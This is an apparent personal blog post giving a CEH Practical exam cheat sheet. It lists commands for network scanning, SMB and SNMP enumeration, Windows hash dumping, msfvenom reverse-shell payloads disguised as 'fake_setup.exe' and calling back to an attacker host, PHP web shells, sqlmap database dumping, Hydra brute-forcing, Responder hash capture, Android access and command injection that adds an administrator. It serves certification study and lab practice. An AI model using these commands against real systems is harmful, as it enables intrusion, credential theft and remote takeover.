CEH Practical Cheat Sheet

on under certs
9 minute read

I’m taking the CEH Practical as a lazy-man’s way of renewing my CEHv10 cert. I studied the day before, for a couple hours, dumping notes that I scraped from other githubs here.

Update: I passed with a score of 20/20, it was pretty easy. I think the exam should be a mandatory training for all helpdesk tier 1 people.



  • -r range , Scan Entire Network for ALive host using ARP
    :~$ netdiscover -r
  • -f switch do not fragment, -l buffer size
    :~$ ping <host-ip> -f -l 1300
    • tracert for windows cmd
      :~$ traceroute <host-ip>
  • Path Analyzer Pro in traceroute tools, ensure icmp and smart is selected, stop on control is selected
  • Start Metasploit Console
    :~# msfdb init && msfconsole
    :~# msfdb status
  • Nmap Scanning entire Network
    Don’t ping=> -Pn, SYN scan=> -sS, Aggresive Scan=> -A, Normal_XML and Grepable format all at once=> -oA, Verbose=> -vv 
    ~$ nmap -Pn -sS -A -oA <Filename> -vv
  • Convert Nmap XML file to HTML Report
    xsltproc <nmap-output.xml> -o <nmap-output.html>
  • Scanning SMB Version for OS Detection using Metasploit
use scanner/smb/smb_version 
show options 
set THREADS 100 
#Type hosts again and os_flavor will be visible 

Scanning Network

-Scan Network:



  • Hyena Expand local workstation to view Users, Services, User Rights, Scheduled Jobs

  • NetBIOS Enumerator Enter IP Range and click scan.

  • NBT (NetBIOS over TCP/IP), which helps troubleshoot NetBIOS name resolution issues.

nbtstat -A
  • Accessing Shared Files
# List All Shared Resources
net view  <IP>

# Connect to Shared Resource
net use
net use \\\e ""\user:""
net use \\\e ""/user:""
  • SNMP Enumeration
nmap -sU -p 161
nmap -sU -p 161 --script=snmp-brute

# Expoilt SNMP with Metasploit
msfdb init && msfconsole ↵
use auxilary/scanner/snmp/snmp_login ↵
set RHOSTS ↵
exploit ↵
use auxilary/scanner/snmp/snmp_enum ↵
set RHOSTS ↵
exploit ↵
  • Enum4linux: Enumerating information from Windows and Samba systems
enum4linux -A <Target_IP>

# Vulnerability Analysis


  • Nessus: Assest vulnerability scanner
  • Nikto: Web Server scanner
nikto -h www.example.com tuning 1

System Hacking

  • Sys password Hacking:
# To Dump Windows SAM file hashes
pwDump7.exe> hashes.txt 

pwDump7.exe : To Dump Windows Hashes PwDump7

  • Ophcrack.exe : To Crack SAM Hashes to obtain clear Password
  • rcrack_gui.exe : Use Raindow Table to crack hashes

  • Create A Reverse TCP Connection:
# creates reverse TCP from windows  machine, send this file to victim machine via python-Webserver/shared resource
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=<attacker_IP> LPORT=444 -o fake_setup.exe  ↵

msfdb init && msfconsole ↵
use exploit/multi/handler ↵
set LHOST=<attacker-IP>  ↵
set LPORT=444 ↵



Hide/unhide text in WhiteSpaces using snow

SNOW.EXE -C -p 1234 -m "Secret Message"  original.txt ciper.txt
# To unhide the hidden text
SNOW.EXE -C -p 1234  ciper.txt

OpenStego : Hide any data within a cover file like Images

QuickStego: Hide text in pictures without password

LLMNR/NBT-NS Poisoning


Responder : rogue authentication server to capture hashes
This can be used to get the already logged-in user’s password, who is trying to access a shared resource which is not present Step by Step

# In Parrot/Kali OS, 
responder -I eth0  ↵

# In windows, try to access the shared resource, logs are stored at usr/share/responder/logs/SMB<filename>
# To crack that hash, use JohntheRipper
john SMB<filename>  ↵

Website Hacking/Password Cracking

-Website Cracking:

  • SkipFish : Active Recon for Websites
skipfish -o 202
# Wordpress site only Users Enumeration
wpscan --url http://example.com/ceh --enumerate u 

# Direct crack if we have user/password details

wpscan --url -U users.txt -P /usr/share/wordlists/rockyou.txt

# Using Metaspoilt
msfdb init && msfconsole
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts
msf auxiliary(wordpress_login_enum) > set targeturi /wordpress
msf auxiliary(wordpress_login_enum) > set user_file user.txt
msf auxiliary(wordpress_login_enum) > set pass_file pass.txt
msf auxiliary(wordpress_login_enum) > exploit

File Upload Vulnerability

msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f raw > file.php
msfdb init && msfconsole
use multi/handler
set payload php/meterepreter/reverse_tcp
set LHOST=attacker-ip
set LPORT= attcker-port

# If incase, metaspolit not working use NetCat and shell code below
nc -vnl -p 1234
  • Weevely : Generate PHP Reverse shell
weevely generate password123 /home/error.php

# Upload the above error.php to website and use the below cmd to get reverse shell

weevely http://domain.com/error.php password123  

SQL Injection

#List databases, add cookie values
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” --dbs 
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low”   --data="id=1&Submit=Submit" --dbs  

# List Tables, add databse name
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name --tables  
# List Columns of that table
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name -T target_Table --columns
#Dump all values of the table
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name -T target_Table --dump
sqlmap -u "http:domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” --os-shell

-Password Cracking:

  • Hydra : FTP, SSH, Telnet
hydra -l username -P passlist.txt ssh
 # FTP
hydra -L userlist.txt -P passlist.txt
# If the service isn't running on the default port, use -s
 hydra -L userlist.txt -P passlist.txt -s 221
hydra -l admin -P passlist.txt -o test.txt telnet

# Login form
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"  


-Cipering / Encrypting/ Hashes:

### Hash

 # In Kali
 #Decrypt Hashes
 hashcat '5f4dcc3b5aa765d61d8327deb882cf99' /usr/share/wordlists/rockyou.txt


  • Encrypt data with Password and only be decoded with cryptoforge by giving password

BCTextEncoder: Text Encode/Decode

VeraCrypt: Disk Encrypt/Decrypt

CrypTool : Encode/Decode Text (File Extension is .hex)

  • File → New → Enter Text → Encrypt/Decrypt → Symmetric (Modern) → RC2 → KEY 05 → Encrypt

  • File → Open → Encrypt/Decrypt → Symmetric (Modern) → RC2 → KEY 05 → Decrypt

Android Hacking


apt-get update
sudo apt-get install adb -y
adb devices -l

# Connection Establish Steps
adb connect
adb devices -l
adb shell  

# Download a File from Android using ADB tool
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt 
adb pull sdcard/log.txt /home/mmurphy/Desktop
# =================================================================================================== 
# Same thing can be done via PhoneSploit tool 
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
python3 -m pip install colorama

python3 phonesploit.py

# Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
# Type 4, to Access Shell on phone

cd sdcard
cd Download

#Download File using PhoneSploit
9. Pull Folders from Phone to PC

Enter the Full Path of file to Download

Covert TCP


# Compile the Code  
cc -o covert_tcp covert_tcp.c
# Reciever Machine(  
sudo ./covert_tcp -dest -source -source_port 9999 -dest_port 8888 -server -file recieve.txt  
# Sender Machine( 
# Create A Message file that need to be transferred Eg:secret.txt
sudo ./covert_tcp -dest -source -source_port 8888 -dest_port 9999 -file secret.txt


# If Python version returned above is 3.X
# On Windows, try "python -m http.server" or "py -3 -m http.server"
python3 -m http.server
# If Python version returned above is 2.X
python -m SimpleHTTPServer
  • $python -m SimpleHTTPServer 9000

  • $python3 -m http.server 9000

  • nslookup www.domain.com

FTP Server


  • Command Injection
<IP> | net user test_user /add
     | net user
     | net localgroup Administrators test_user /add
     | net localgroup Administrators

File Upload Vul::

  • Create file.php
  • Rename to File.php.jpg
  • Then add GIF98 and upload and rename .php.jgp
  • Chain attack to execute, go in Command Shell and run

    copy c:\wamp64\www\DVWA\hackable\uploads\filename.php.jpg c:\wamp64\www\DVWA\hackable\uploads\shell.php
  • Insert Username Password in Website: [blah;insert into login values (‘john’,’pass123’); –]
certs, ceh, exam
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